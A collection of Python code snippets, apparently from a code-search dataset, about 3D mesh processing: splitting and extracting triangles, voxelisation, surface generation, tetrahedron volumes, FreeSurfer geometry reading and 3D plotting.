[ "def split_triangles(mesh):\n triangles = np.asarray(mesh.triangles).copy()\n vertices = np.asarray(mesh.vertices).copy()\n\n triangles_3 = np.zeros_like(triangles)\n vertices_3 = np.zeros((len(triangles) * 3, 3), dtype=vertices.dtype)\n\n for index_triangle, t in enumerate(triangles):\n index_vertex = index_triangle * 3\n vertices_3[index_vertex] = vertices[t[0]]\n vertices_3[index_vertex + 1] = vertices[t[1]]\n vertices_3[index_vertex + 2] = vertices[t[2]]\n\n triangles_3[index_triangle] = np.arange(index_vertex, index_vertex + 3)\n\n mesh_return = deepcopy(mesh)\n mesh_return.triangles = o3d.utility.Vector3iVector(triangles_3)\n mesh_return.vertices = o3d.utility.Vector3dVector(vertices_3)\n mesh_return.triangle_normals = mesh.triangle_normals\n mesh_return.paint_uniform_color([0.5, 0.5, 0.5])\n return mesh_return", "def extract_triangles(mesh, materials_list):\n tri_list = []\n do_uv = bool(mesh.tessface_uv_textures)\n\n for mat in materials_list:\n for i, face in enumerate(mesh.tessfaces):\n f_v = face.vertices\n if mesh.materials[face.material_index].name != mat: continue\n\n uf = mesh.tessface_uv_textures.active.data[i] if do_uv else None\n\n fmt = 0\n if(do_uv): fmt = face.material_index\n\n if do_uv:\n f_uv = uf.uv\n\n if len(f_v) == 3:\n new_tri = tri_wrapper((f_v[0], f_v[1], f_v[2]), fmt)\n if (do_uv):\n new_tri.faceuvs = uv_key(f_uv[0]), uv_key(f_uv[1]), uv_key(f_uv[2])\n else: new_tri.faceuvs = uv_key((0.0,0.0)), uv_key((1.0,0.0)), uv_key((0.0,1.0))\n tri_list.append(new_tri)\n\n else: # it's a quad\n new_tri = tri_wrapper((f_v[0], f_v[1], f_v[2]), fmt)\n new_tri_2 = tri_wrapper((f_v[0], f_v[2], f_v[3]), fmt)\n\n if (do_uv):\n new_tri.faceuvs = uv_key(f_uv[0]), uv_key(f_uv[1]), uv_key(f_uv[2])\n new_tri_2.faceuvs = uv_key(f_uv[0]), uv_key(f_uv[2]), uv_key(f_uv[3])\n else:\n new_tri.faceuvs = uv_key((0.0,0.0)), uv_key((1.0,0.0)), uv_key((0.0,1.0))\n new_tri_2.faceuvs = uv_key((0.0,0.0)), uv_key((1.0,0.0)), uv_key((0.0,1.0))\n\n tri_list.append(new_tri)\n tri_list.append(new_tri_2)\n\n return tri_list", "def get_triangles_per_surface(my_core, entity_ranges):\n\n t_p_s = {}\n for surface in entity_ranges['Surfaces']:\n t_p_s[surface] = my_core.get_entities_by_type(\n surface, types.MBTRI).size()\n return t_p_s", "def get_triangles(self):\n location = TopLoc_Location()\n bt = BRep_Tool()\n facing = bt.Triangulation(self.topods_shape(), location)\n if facing == None:\n return [], []\n\n tab = facing.Nodes()\n tri = facing.Triangles()\n verts = []\n for i in range(1, facing.NbNodes() + 1):\n p = tab.Value(i).Transformed(location.Transformation())\n verts.append(np.array(list(p.Coord())))\n\n tris = []\n reversed = self.reversed()\n for i in range(1, facing.NbTriangles() + 1):\n # OCC triangle normals point in the surface normal\n # direction\n if reversed:\n index1, index3, index2 = tri.Value(i).Get()\n else:\n index1, index2, index3 = tri.Value(i).Get()\n\n tris.append([index1 - 1, index2 - 1, index3 - 1])\n\n return np.asarray(verts, dtype=np.float32), np.asarray(tris, dtype=np.int32)", "def exportTriangles(self):\n # Filter out triangles with any vertex in the extended BBox\n return [(a-4,b-4,c-4)\n for (a,b,c) in self.triangles if a > 3 and b > 3 and c > 3]", "def exportTriangles(self):\n # Filter out triangles with any vertex in the extended BBox\n return [(a-4, b-4, c-4)\n for (a, b, c) in self.triangles if a > 3 and b > 3 and c > 3]", "def plot3surface( pot, **kwargs ): \n \n fig = plt.figure( figsize = (8., 8.) 
) \n gs = matplotlib.gridspec.GridSpec( 3,2, wspace=0.2) \n \n # Make a list with three perpendicular directions which \n # will define the three surface cuts \n perp = [(np.pi/2., 0.), (np.pi/2., -np.pi/2.), (0., -1.*np.pi/2.) ]\n \n # Iterate to plot the three surface cuts\n yMin = 1e16\n yMax = -1e16 \n Ims = []\n for i in range(3):\n ax0 = fig.add_subplot( gs[i,0], projection='3d')\n ax1 = fig.add_subplot( gs[i,1]) \n \n T0, T1, X, Y, Z = surfcut_points( normal = perp[i], \\\n ax0=ax0, **kwargs ) \n \n EVAL = pot.evalpotential(X,Y,Z)\n im = ax1.pcolormesh( T0, T1, EVAL, \\\n cmap=plt.get_cmap('jet') ) \n plt.axes( ax1 ) \n cbar = plt.colorbar(im)\n cbar.set_label( pot.unitlabel, rotation=0) \n \n ymin = EVAL.min()\n ymax = EVAL.max()\n \n Ims.append(im) \n if ymin < yMin : yMin = ymin\n if ymax > yMax : yMax = ymax \n \n for im in Ims:\n im.set_clim( vmin=yMin, vmax=yMax)", "def trimesh_from_point_cloud(cloud):\n points = np.asarray(cloud)\n hull = scipy.spatial.ConvexHull(points)\n hull = scipy.spatial.ConvexHull(points[hull.vertices])\n ru.transforms.counterclockwise_hull(hull)\n vertices = hull.points\n faces = hull.simplices\n return vertices, faces", "def compute_geom_weights(self):\n weights = np.zeros([np.size(self._triangles, 0), 3])\n tris_pts = self._tris_pts\n for ipt in range(3):\n p0 = tris_pts[:, (ipt) % 3, :]\n p1 = tris_pts[:, (ipt+1) % 3, :]\n p2 = tris_pts[:, (ipt-1) % 3, :]\n alpha1 = np.arctan2(p1[:, 1]-p0[:, 1], p1[:, 0]-p0[:, 0])\n alpha2 = np.arctan2(p2[:, 1]-p0[:, 1], p2[:, 0]-p0[:, 0])\n # In the below formula we could take modulo 2. but\n # modulo 1. is safer regarding round-off errors (flat triangles).\n angle = np.abs(np.mod((alpha2-alpha1) / np.pi, 1.))\n # Weight proportional to angle up np.pi/2 ; null weight for\n # degenerated cases 0. and np.pi (Note that `angle` is normalized\n # by np.pi)\n weights[:, ipt] = 0.5 - np.abs(angle-0.5)\n return weights", "def get_surface_facets(self):\n self.setup_connectivity(self.tdim - 1, self.tdim)\n conn = self.get_conn(self.tdim - 1, self.tdim)\n\n ii = np.where(np.diff(conn.offsets) == 1)[0]\n\n return ii.astype(np.uint32)", "def triangle_facets(length=2.0, divisions=4):\n\n # Starting with a equilateral triangle.\n vertices = [\n (0, (math.sqrt(3) / 3.0) * length, 0.0),\n (-length / 2, -(math.sqrt(3) / 6.0) * length, 0.0),\n (length / 2, -(math.sqrt(3) / 6.0) * length, 0.0),\n ]\n\n # The facets should not be accumulated for all of them as the first\n # triangle will Z-fight with remaining triangles. 
The overall style is to\n # have 'holes' where there are triangles that aren't filled.\n\n facets = [(0, 1, 2)]\n new_triangles = facets\n\n for _ in range(divisions):\n facets = []\n for new_triangle in new_triangles:\n next_vertices, next_triangles = _divide(new_triangle, vertices)\n vertices.extend(next_vertices)\n facets.extend(next_triangles)\n\n new_triangles = facets\n\n return vertices, facets", "def _get_surfaces(idf):\n surfaces = idf.getsurfaces() + idf.getshadingsurfaces() + idf.getsubsurfaces()\n return surfaces", "def test_volume_3d(self):\n # generate voronoi mesh \n mesh = Mesh3d(self.particles, self.bound)\n print(\"building mesh...\")\n mesh.build_geometry()\n print(\"mesh complete\")\n\n # calculate voronoi volumes of all real particles \n real_indices = self.particles[\"tag\"] == ParticleTAGS.Real\n tot_vol = np.sum(self.particles[\"volume\"][real_indices])\n\n self.assertAlmostEqual(tot_vol, 1.0)", "def surface(func, umin=0, umax=2*np.pi, ucount=64, urepeat=1.0,\n vmin=0, vmax=2*np.pi, vcount=64, vrepeat=1.0):\n\n vtype = [('position', np.float32, 3),\n ('texcoord', np.float32, 2),\n ('normal', np.float32, 3)]\n itype = np.uint32\n\n # umin, umax, ucount = 0, 2*np.pi, 64\n # vmin, vmax, vcount = 0, 2*np.pi, 64\n\n vcount += 1\n ucount += 1\n n = vcount*ucount\n\n Un = np.repeat(np.linspace(0, 1, ucount, endpoint=True), vcount)\n Vn = np.tile (np.linspace(0, 1, vcount, endpoint=True), ucount)\n U = umin+Un*(umax-umin)\n V = vmin+Vn*(vmax-vmin)\n\n vertices = np.zeros(n, dtype=vtype)\n for i,(u,v) in enumerate(zip(U,V)):\n vertices[\"position\"][i] = func(u,v)\n\n vertices[\"texcoord\"][:,0] = Un*urepeat\n vertices[\"texcoord\"][:,1] = Vn*vrepeat\n\n indices = []\n for i in range(ucount-1):\n for j in range(vcount-1):\n indices.append(i*(vcount) + j )\n indices.append(i*(vcount) + j+1 )\n indices.append(i*(vcount) + j+vcount+1)\n indices.append(i*(vcount) + j+vcount )\n indices.append(i*(vcount) + j+vcount+1)\n indices.append(i*(vcount) + j )\n indices = np.array(indices, dtype=itype)\n vertices[\"normal\"] = normals(vertices[\"position\"],\n indices.reshape(len(indices)//3,3))\n\n return vertices.view(gloo.VertexBuffer), indices.view(gloo.IndexBuffer)", "def depthFaceSelect(self, triangleSelected,depth, materials):\t\n\t\tlayersR = list()\n\t\tlayersG = list()\n\t\tlayersB = list()\n\t\t\n\t\tlayerMaterial = list()\n\t\tself.volumeComposition = list()\n\t\tfor l in range(len(materials)):\n\t\t\tlayerMaterial.append(list())\n\t\t\tself.volumeComposition.append(list())\n\t\t\n\t\tvolumeGeneral = list()\n\t\tself.boolLayers = []\n\t\t\n\t\tfor i in self.slicePoints:\n\t\t\tboolResult2 = self.voxel_slice(i, self.vertices, self.triangles, self.res, self.llc, self.sliceProto, 2)\n\t\t\tprint boolResult2.shape\n\t\t\ttupleResultR = numpy.zeros(boolResult2.shape, dtype=uint8)\n\t\t\ttupleResultG = numpy.zeros(boolResult2.shape, dtype=uint8)\n\t\t\ttupleResultB = numpy.zeros(boolResult2.shape, dtype=uint8)\n\t\t\ttupleMaterial = list()\n\t\t\tfor l in range(len(materials)):\n\t\t\t\ttupleMaterial.append(numpy.zeros(boolResult2.shape, dtype=float))\n\t\t\t#tupleMaterial = numpy.zeros(boolResult2.shape, dtype=f)\n\t\t\t#lines=self.findSelectedContour(self.vertices,triangleSelected,i ,numpy.array([0,0,1]))\n\t\t\t#boolResult1 = self.findVoxelOfSelectedContour(i, lines, self.res, self.llc, self.sliceProto, depth)\n\t\t\tj = numpy.nditer(boolResult2, flags=['multi_index'], op_flags=['readwrite'])\n\n\t\t\twhile not j.finished:\t\n\t\t\t\tprint type(j.multi_index)\n\t\t\t\tprint 
j.multi_index\n\t\t\t\tif j[0] == True:\n\t\t\t\t\ttupleResultB[j.multi_index] = materials[0][0]\n\t\t\t\t\ttupleResultG[j.multi_index] = materials[0][1]\n\t\t\t\t\ttupleResultR[j.multi_index] = materials[0][2]\n\t\t\t\t\ttupleMaterial[0][j.multi_index] = 1.0 \n\t\t\t\telse:\n\t\t\t\t\ttupleResultB[j.multi_index] = 0\n\t\t\t\t\ttupleResultG[j.multi_index] = 0\n\t\t\t\t\ttupleResultR[j.multi_index] = 0\n\t\t\t\tj.iternext()\t\t\t\t\n\t\t\t\t\t\n\t\t\tfor k in range(len(triangleSelected)):\n\t\t\t\tboolResult1 = self.findVoxelOfSelectedContour(i, self.vertices, triangleSelected[k], self.res, self.llc, self.sliceProto, depth[k])\n\t\t\t\tboolResult = numpy.logical_and(boolResult1, boolResult2)\n\t\t\t\tprint boolResult.shape\n\n\t\t\t\tj = numpy.nditer(boolResult2, flags=['multi_index'], op_flags=['readwrite'])\n\t\t\t\twhile not j.finished:\n\t\t\t\t\tif j[0] == True:\n\t\t\t\t\t\tif boolResult[j.multi_index] == True:\n\t\t\t\t\t\t\ttupleResultB[j.multi_index] = materials[k + 1][0]\n\t\t\t\t\t\t\ttupleResultG[j.multi_index] = materials[k + 1][1]\n\t\t\t\t\t\t\ttupleResultR[j.multi_index] = materials[k + 1][2]\n\t\t\t\t\t\t\ttupleMaterial[k + 1][j.multi_index] = 1.0 \n\t\t\t\t\t\t\ttupleMaterial[0][j.multi_index] = 0.0\n\t\t\t\t\t\t#else:\n\t\t\t\t\t\t#\ttupleResultB[j.multi_index] = 255\n\t\t\t\t\t\t#\ttupleResultG[j.multi_index] = 0\n\t\t\t\t\t\t#\ttupleResultR[j.multi_index] = 0\t\t\t\t\t\n\t\t\t\t\tj.iternext()\n\t\t\tself.boolLayers.append(boolResult2)\n\t\t\tlayersR.append(tupleResultR)\n\t\t\tlayersG.append(tupleResultG)\n\t\t\tlayersB.append(tupleResultB)\n\t\t\tfor l in range(len(materials)):\n\t\t\t\tlayerMaterial[l].append(tupleMaterial[l])\n\t\t\t\t\n\t\tprint \"i got here\"\n\t\tself.volumeR=numpy.array(layersR) # create the 3d volume\n\t\tself.volumeG=numpy.array(layersG) \n\t\tself.volumeB=numpy.array(layersB)\n\t\t\n\t\tfor l in range(len(materials)):\n\t\t\tself.volumeComposition[l] = numpy.array(layerMaterial[l])\n\t\tvolumeGeneral.append(self.volumeR)\n\t\tvolumeGeneral.append(self.volumeG)\n\t\tvolumeGeneral.append(self.volumeB)\n\t\t\n\t\treturn volumeGeneral", "def tdim3(dim3):\n return TransformedDimension(Compose([], dim3.type), dim3)", "def get_all_object_triangles( filename, scale , translation=(0,0,0)):\n import warnings\n warnings.warn(\"@PendingDeprecationWarning\", PendingDeprecationWarning)\n vertexObjs = read_vertices_objects( filename )\n faceObjs = read_faces_objects( filename )\n\n r = []\n j = 0\n \n # Validation:\n vertices, faces = [],[]\n for obj in range(len(vertexObjs)):\n vertices += vertexObjs[obj]\n faces += faceObjs[obj]\n max_vertex_index = max([max(x) for x in faces])\n if len(vertices) != max_vertex_index:\n logging.warning( \"ParseWarning: A face's vertex index number is does not match the quantity of read vertices.\" )\n logging.warning( \"Qty of Vertices: \"+str(len(vertices))+\", Largest Face Index: \"+str(max_vertex_index) )\n\n # Parse as Tris:\n for obj in range(len(vertexObjs)):\n vertices = vertexObjs[obj]\n faces = faceObjs[obj]\n r.append([])\n c = 0\n for f in faces: # for every face\n for i in f: # for each index point in face\n c+=1\n try:\n # Get the face[i] vertex\n v = vertices[i-1]\n except IndexError as indErr:\n logging.warning(\"IndexError: Attempted to access index: \"+str(i-1)+\" in list of length: \"+str(len(vertices)))\n raise IndexError\n # Scale the face[i] vertex\n scV = [v[0]*scale, v[1]*scale, v[2]*scale]\n # Translate the scaled face vertex:\n t = translation\n tmpv = [scV[0]+t[0],scV[1]+t[1], scV[2]+t[2]]\n # 
Retain this vertex\n r[j].append(tmpv)\n # ---------------------\n if c % 3 == 0:\n j+=1\n r.append([])\n r = r[:len(r)-1] # remove the final empty list.\n\n checkShapeValidity( r )\n return r", "def visualize_in_3d(self,**kwargs):\n fig = plt.figure(figsize=(7,7))\n ax = fig.add_subplot(111, projection='3d')\n\n points = np.vstack([\n c.to_matrix() for c in self.contours if c.inclusion\n ])\n points[:,:2] = points[:,:2] * self.scan.pixel_spacing\n\n # Center the points at the origin for \n # spherical coordinates conversion.\n points = points - points.mean(axis=0)\n\n # Triangulate the azimuth and zenith transformation.\n azimuth = np.arctan2(points[:,1],points[:,0])\n zenith = np.arccos(points[:,2] / np.linalg.norm(points,axis=1))\n azi_zen = np.c_[azimuth.flatten(),zenith.flatten()]\n triangles = Delaunay(azi_zen).simplices\n\n # Start the points at 0 on every axis.\n # This lets the axis ticks to be interpreted as length in mm.\n points = points - points.min(axis=0)\n\n ax.set_xlabel('length (mm)')\n ax.set_ylabel('length (mm)')\n ax.set_zlabel('length (mm)')\n\n # Plot the points.\n ax.plot_trisurf(points[:,0], points[:,1], points[:,2],\n triangles=triangles, **kwargs)\n plt.show()", "def volume_tetrahedron(xyz, A, B, C, D):\n\n AD = xyz[A, :] - xyz[D, :]\n BD = xyz[B, :] - xyz[D, :]\n CD = xyz[C, :] - xyz[D, :]\n\n V = (\n (BD[:, 0] * CD[:, 1] - BD[:, 1] * CD[:, 0]) * AD[:, 2]\n - (BD[:, 0] * CD[:, 2] - BD[:, 2] * CD[:, 0]) * AD[:, 1]\n + (BD[:, 1] * CD[:, 2] - BD[:, 2] * CD[:, 1]) * AD[:, 0]\n )\n return V / 6", "def render_wireframe_3d(self, **kwds):\n wireframe = [];\n for l in self.lines:\n l_coords = self.coordinates_of(l)\n wireframe.append( line3d(l_coords, **kwds))\n for a in self.arrows:\n a_coords = self.coordinates_of(a)\n wireframe.append(arrow3d(a_coords[0], a_coords[1], **kwds))\n return sum(wireframe)", "def render_solid_3d(self, **kwds):\n return sum([ polygon3d(self.coordinates_of(f), **kwds) \n for f in self.polygons ])", "def get_triangles_per_vertex(my_core, native_ranges):\n\n t_p_v_data = []\n tri_dimension = 2\n for vertex in native_ranges[types.MBVERTEX]:\n t_p_v_data.append(my_core.get_adjacencies(vertex, tri_dimension).size())\n return np.array(t_p_v_data)", "def test_continuity_triangle_facet(degree, element, variant):\n elements = {}\n for cell in [basix.CellType.tetrahedron, basix.CellType.prism]: # , basix.CellType.pyramid]:\n try:\n elements[cell] = basix.create_element(element, cell, degree, *variant)\n except RuntimeError:\n pass\n\n if len(elements) <= 1:\n pytest.skip()\n\n facets = [\n [\n np.array([0, 0, 0]), np.array([1, 0, 0]), np.array([0, 1, 0]),\n {basix.CellType.tetrahedron: 3, basix.CellType.prism: 0}\n ], [\n np.array([0, 0, 0]), np.array([1, 0, 0]), np.array([0, 0, 1]),\n {basix.CellType.tetrahedron: 2, basix.CellType.pyramid: 1}\n ], [\n np.array([0, 0, 0]), np.array([0, 1, 0]), np.array([0, 0, 1]),\n {basix.CellType.tetrahedron: 1, basix.CellType.pyramid: 2}\n ],\n ]\n\n for v0, v1, v2, cellmap in facets:\n points = np.array([v0 + i/10 * (v1 - v0) + j/10 * (v2 - v0) for i in range(11) for j in range(11 - i)])\n\n data = None\n\n for c, e in elements.items():\n if c in cellmap:\n tab = e.tabulate(0, points)\n continuity_map = create_continuity_map_triangle(e.map_type, v0, v1, v2)\n entity_tab = [continuity_map(tab[:, :, i, :]) for i in e.entity_dofs[2][cellmap[c]]]\n if data is None:\n data = entity_tab\n else:\n assert np.allclose(data, entity_tab)", "def voxelize4(self, materials):\n\t\tlayers = list()\n\t\tlayersR = 
list()\n\t\tlayersG = list()\n\t\tlayersB = list()\n\t\t\n\t\tlayerMaterial = list()\n\t\tself.volumeComposition = list()\n\t\tfor l in range(len(materials)):\n\t\t\tlayerMaterial.append(list())\n\t\t\tself.volumeComposition.append(list())\n\n\t\tvolumeGeneral = list()\n\t\tm = 0\n\t\tfor i in self.slicePoints:\n\t\t\t#print self.boolResult[m].shape\n\t\t\ttupleResultR = numpy.zeros(self.boolLayers[m].shape, dtype=uint8)\n\t\t\ttupleResultG = numpy.zeros(self.boolLayers[m].shape, dtype=uint8)\n\t\t\ttupleResultB = numpy.zeros(self.boolLayers[m].shape, dtype=uint8)\n\t\t\ttupleMaterial = list()\n\t\t\tfor l in range(len(materials)):\n\t\t\t\ttupleMaterial.append(numpy.zeros(self.boolLayers[m].shape, dtype=float))\n\t\t\t\n\t\t\tj = numpy.nditer(self.boolLayers[m], flags=['multi_index'], op_flags=['readwrite'])\n\t\t\twhile not j.finished:\n\t\t\t\tif j[0] == True:\n\t\t\t\t#tupleResult[j.multi_index] = round((i[direction] - minValue) * ratio)\n\t\t\t\t#tupleResult[j.multi_index] = 78\n\t\t\t\t\tprint type(j.multi_index)\n\t\t\t\t\tprint j.multi_index\n\t\t\t\t\t#tupleResult[j.multi_index] = planeWeight * math.fabs((j.multi_index[1] - planeOrigin[0]) * planeNormal[0] + (j.multi_index[0] - planeOrigin[1]) * planeNormal[1] + (i[2] - planeOrigin[2]) * planeNormal[2]) + pointWeight * math.sqrt(math.pow((j.multi_index[1]- pointValue[0]),2) + math.pow((j.multi_index[0] - pointValue[1]), 2)+math.pow((i[2] - pointValue[2]),2))\n\t\t\t\t\t\n\t\t\t\t\tdistanceList = []\n\t\t\t\t\ttotalDistance = 0.0\n\t\t\t\t\tfor k in range(len(materials)):\n\t\t\t\t\t\tif materials[k].controlSourceType == \"Plane\":\n\t\t\t\t\t\t\tGplane = math.fabs((j.multi_index[1] - materials[k].origin[0]) * materials[k].normal[0] + (j.multi_index[0] - materials[k].origin[1]) * materials[k].normal[1] + (i[2] - materials[k].origin[2]) * materials[k].normal[2])\n\t\t\t\t\t\t\tdistanceList.append(Gplane)\n\t\t\t\t\t\t\ttotalDistance += Gplane\n\t\t\t\t\t\tif materials[k].controlSourceType == \"Point\":\n\t\t\t\t\t\t\tGpoint = (math.sqrt(math.pow((j.multi_index[1]- materials[k].point[0]),2) + math.pow((j.multi_index[0] - materials[k].point[1]), 2)+math.pow((i[2] - materials[k].point[2]),2)))\n\t\t\t\t\t\t\tdistanceList.append(Gpoint)\n\t\t\t\t\t\t\ttotalDistance += Gpoint\n\t\t\t\t\tfor k in range(len(distanceList)):\n\t\t\t\t\t\tdistanceList[k] = distanceList[k] / totalDistance\n\t\t\t\t\t\tdistanceList[k] = 1.0 - distanceList[k]\n\t\t\t\t\t\t\n\t\t\t\t\t\ttupleMaterial[k][j.multi_index] = distanceList[k]\n\t\t\t\t\t\t\n\t\t\t\t\t\ttupleResultR[j.multi_index] += materials[k].materialColor[0] * distanceList[k] * materials[k].weight\n\t\t\t\t\t\ttupleResultG[j.multi_index] += materials[k].materialColor[1] * distanceList[k] * materials[k].weight\n\t\t\t\t\t\ttupleResultB[j.multi_index] += materials[k].materialColor[2] * distanceList[k] * materials[k].weight\n\t\t\t\t\t#if(tupleResult[j.multi_index] > 0):\n\t\t\t\t\t#\ttupleResult[j.multi_index] = round(tupleResult[j.multi_index]) \n\t\t\t\t\t#if(tupleResult[j.multi_index] == 0):\n\t\t\t\t\t#\t\ttupleResult[j.multi_index] = 1\n\t\t\t\t\t#if(tupleResult[j.multi_index] < 0):\n\t\t\t\t\t#\ttupleResult[j.multi_index] = round(0 - tupleResult[j.multi_index]) \n\t\t\t\telse:\n\t\t\t\t\ttupleResultR[j.multi_index] = 0\n\t\t\t\t\ttupleResultG[j.multi_index] = 0\n\t\t\t\t\ttupleResultB[j.multi_index] = 0\n\t\t\t\t\tfor k in range(len(materials)):\n\t\t\t\t\t\ttupleMaterial[k][j.multi_index] = 
0.0\n\t\t\t\tj.iternext()\n\t\t\tlayersR.append(tupleResultR)\n\t\t\tlayersG.append(tupleResultG)\n\t\t\tlayersB.append(tupleResultB)\n\t\t\tfor k in range(len(materials)):\n\t\t\t\tlayerMaterial[k].append(tupleMaterial[k])\n\t\t\t\t\n\t\t\tm = m + 1\n\t\tprint \"i got here\"\n\t\tvolumeR=numpy.array(layersR) # create the 3d volume\n\t\tvolumeG=numpy.array(layersG) \n\t\tvolumeB=numpy.array(layersB)\n\t\tfor k in range(len(materials)):\n\t\t\tself.volumeComposition[k] = numpy.array(layerMaterial[k])\n\t\t\n\t\tvolumeGeneral.append(volumeR)\n\t\tvolumeGeneral.append(volumeG)\n\t\tvolumeGeneral.append(volumeB)\n\t\treturn volumeGeneral", "def get_triangles(\n self,\n triangle_face_tol=0.01, # Tolerance between triangle and surface\n tol_relative_to_face=True, # The tolerance value is relative to the face size\n angle_tol_rads=0.1, # Angle between normals/tangents at triangle vertices\n ):\n ok = self.triangulate_all_faces(\n triangle_face_tol, tol_relative_to_face, angle_tol_rads\n )\n if not ok:\n # Failed to triangulate\n return None, None\n verts = []\n tris = []\n faces = self.faces()\n last_vert_index = 0\n for face in faces:\n fverts, ftris = face.get_triangles()\n verts.extend(fverts)\n for tri in ftris:\n new_indices = [index + last_vert_index for index in tri]\n tris.append(new_indices)\n last_vert_index = len(verts)\n return np.asarray(verts, dtype=np.float32), np.asarray(tris, dtype=np.int32)", "def get_volumes(self, dim):\n cdef np.ndarray[float64, mode='c', ndim=1] out\n\n if dim == 0:\n raise ValueError('vertices have no volume!')\n\n else:\n out = np.empty((self.mesh.topology.num[dim],),\n dtype=np.float64)\n mesh_get_volumes(self.mesh, &out[0], dim)\n\n return out", "def read_geometry(filepath, read_metadata=False, read_stamp=False):\n volume_info = OrderedDict()\n\n TRIANGLE_MAGIC = 16777214\n QUAD_MAGIC = 16777215\n NEW_QUAD_MAGIC = 16777213\n with open(filepath, \"rb\") as fobj:\n magic = _fread3(fobj)\n if magic in (QUAD_MAGIC, NEW_QUAD_MAGIC): # Quad file\n nvert = _fread3(fobj)\n nquad = _fread3(fobj)\n (fmt, div) = (\">i2\", 100.) 
if magic == QUAD_MAGIC else (\">f4\", 1.)\n coords = np.fromfile(fobj, fmt, nvert * 3).astype(np.float) / div\n coords = coords.reshape(-1, 3)\n quads = _fread3_many(fobj, nquad * 4)\n quads = quads.reshape(nquad, 4)\n #\n # Face splitting follows\n #\n faces = np.zeros((2 * nquad, 3), dtype=np.int)\n nface = 0\n for quad in quads:\n if (quad[0] % 2) == 0:\n faces[nface] = quad[0], quad[1], quad[3]\n nface += 1\n faces[nface] = quad[2], quad[3], quad[1]\n nface += 1\n else:\n faces[nface] = quad[0], quad[1], quad[2]\n nface += 1\n faces[nface] = quad[0], quad[2], quad[3]\n nface += 1\n\n elif magic == TRIANGLE_MAGIC: # Triangle file\n create_stamp = fobj.readline().rstrip(b'\\n').decode('utf-8')\n fobj.readline()\n vnum = np.fromfile(fobj, \">i4\", 1)[0]\n fnum = np.fromfile(fobj, \">i4\", 1)[0]\n coords = np.fromfile(fobj, \">f4\", vnum * 3).reshape(vnum, 3)\n faces = np.fromfile(fobj, \">i4\", fnum * 3).reshape(fnum, 3)\n\n if read_metadata:\n volume_info = _read_volume_info(fobj)\n else:\n raise ValueError(\"File does not appear to be a Freesurfer surface\")\n\n coords = coords.astype(np.float) # XXX: due to mayavi bug on mac 32bits\n\n ret = (coords, faces)\n if read_metadata:\n if len(volume_info) == 0:\n warnings.warn('No volume information contained in the file')\n ret += (volume_info,)\n if read_stamp:\n ret += (create_stamp,)\n\n return ret", "def D3(self, *args):\n return _Adaptor3d.Adaptor3d_Surface_D3(self, *args)", "def check_geometry(surface, space, donor=None, data_dir=None):\n\n if len(surface) != 2:\n raise TypeError('Must provide a tuple of geometry files')\n\n # fsaverage5, fsaverage6, etc\n if 'fsaverage' in space and space != 'fsaverage':\n space = 'fsaverage'\n space_opts = ('fsaverage', 'fsnative', 'fslr')\n if space not in space_opts:\n raise ValueError(f'Provided space must be one of {space_opts}.')\n if space == 'fsnative' and donor is None:\n raise ValueError('Specified space is \"fsnative\" but no donor ID '\n 'supplied')\n\n try:\n coords, triangles = map(list, zip(*[\n load_gifti(img).agg_data() for img in surface\n ]))\n except TypeError:\n coords, triangles = map(list, zip(*[i for i in surface]))\n\n triangles[-1] += coords[0].shape[0]\n coords, triangles = np.row_stack(coords), np.row_stack(triangles)\n\n if space == 'fsaverage':\n coords = transforms.fsaverage_to_mni152(coords)\n elif space == 'fsnative':\n coords = transforms.fsnative_to_xyz(coords, donor, data_dir=data_dir)\n\n return coords, triangles", "def get_mesh_boundary(triangles):\n # Create edges and sort each vertices on each edge.\n edge0 = triangles[:,0:2]\n edge1 = triangles[:,1:3]\n edge2 = triangles.take((0,2), axis=1)\n edges = np.concatenate((edge0, edge1, edge2), axis=0)\n edge_sort = np.sort(edges, axis=1)\n\n # Get unique edges that are only present once.\n (uniq, uniq_ids, counts) = np.unique(edge_sort, axis=0, return_index=True, return_counts=True)\n edge_inds = np.arange(edge_sort.shape[0], dtype=int)\n outer_edge_ids = edge_inds[np.in1d(edge_inds, uniq_ids[counts==1])]\n outer_edges = edge_sort[outer_edge_ids,:]\n num_outer_edges = outer_edges.shape[0]\n\n # Assume we need to close the polygon.\n num_outer_verts = num_outer_edges + 1\n\n # Loop over outer edges and use traversal method to get ordered vertices.\n v_start = outer_edges[0,0]\n v_end = outer_edges[0,1]\n vert_inds = -1*np.ones(num_outer_verts, dtype=int)\n vert_inds[0] = v_start\n vert_inds[1] = v_end\n vert_num = 2\n outer_edges[0,:] = -1\n for edge_num in range(1,num_outer_edges):\n edge_inds_next = 
np.where(outer_edges == v_end)\n if (edge_inds_next[0].shape[0] < 1):\n msg = \"Next edge not found for vertex %d\" % v_end\n raise ValueError(msg)\n edge_ind_next = edge_inds_next[0][0]\n vert_ind_next = 0\n if (edge_inds_next[1][0] == 0):\n vert_ind_next = 1\n vert_inds[vert_num] = outer_edges[edge_ind_next, vert_ind_next]\n outer_edges[edge_ind_next, :] = -1\n v_end = vert_inds[vert_num]\n vert_num += 1\n\n return vert_inds", "def plot_surface_3D(self, length = 30, fps = 30, **kwargs):\n fig = utils.get_figure(scale = 3)\n ax = fig.add_subplot(111, projection = '3d')\n\n # surface_x = self.xi_1_mesh\n # surface_y = self.xi_2_mesh\n # surface_x, surface_y, surface_z = self.surface()\n xyz = self.surface()\n\n # surface_x, surface_y = np.meshgrid(surface_x, surface_y)\n\n # print(np.shape(surface_x))\n # print(np.shape(surface_y))\n # print(np.shape(surface_z))\n\n control_points_x = np.array([control_point[0] for control_point in self.control_net.values()])\n control_points_y = np.array([control_point[1] for control_point in self.control_net.values()])\n control_points_z = np.array([control_point[2] for control_point in self.control_net.values()])\n\n # x_min = min(np.min(surface_x), np.min(control_points_x))\n # x_max = max(np.max(surface_x), np.max(control_points_x))\n # x_range = np.abs(x_max - x_min)\n #\n # y_min = min(np.min(surface_y), np.min(control_points_y))\n # y_max = max(np.max(surface_y), np.max(control_points_y))\n # y_range = np.abs(y_max - y_min)\n #\n # z_min = min(np.min(surface_z), np.min(control_points_z))\n # z_max = max(np.max(surface_z), np.max(control_points_z))\n # z_range = np.abs(z_max - z_min)\n #\n # ax.set_xlim(x_min - 0.05 * x_range, x_max + 0.05 * x_range)\n # ax.set_ylim(y_min - 0.05 * y_range, y_max + 0.05 * y_range)\n # ax.set_zlim(z_min - 0.05 * z_range, z_max + 0.05 * z_range)\n\n ax.scatter(control_points_x, control_points_y, control_points_z, depthshade = False, **CONTROL_POLYGON_KWARGS)\n\n # print(np.max(surface_x), np.max(surface_y), np.max(surface_z))\n # print(np.min(surface_x), np.min(surface_y), np.min(surface_z))\n # 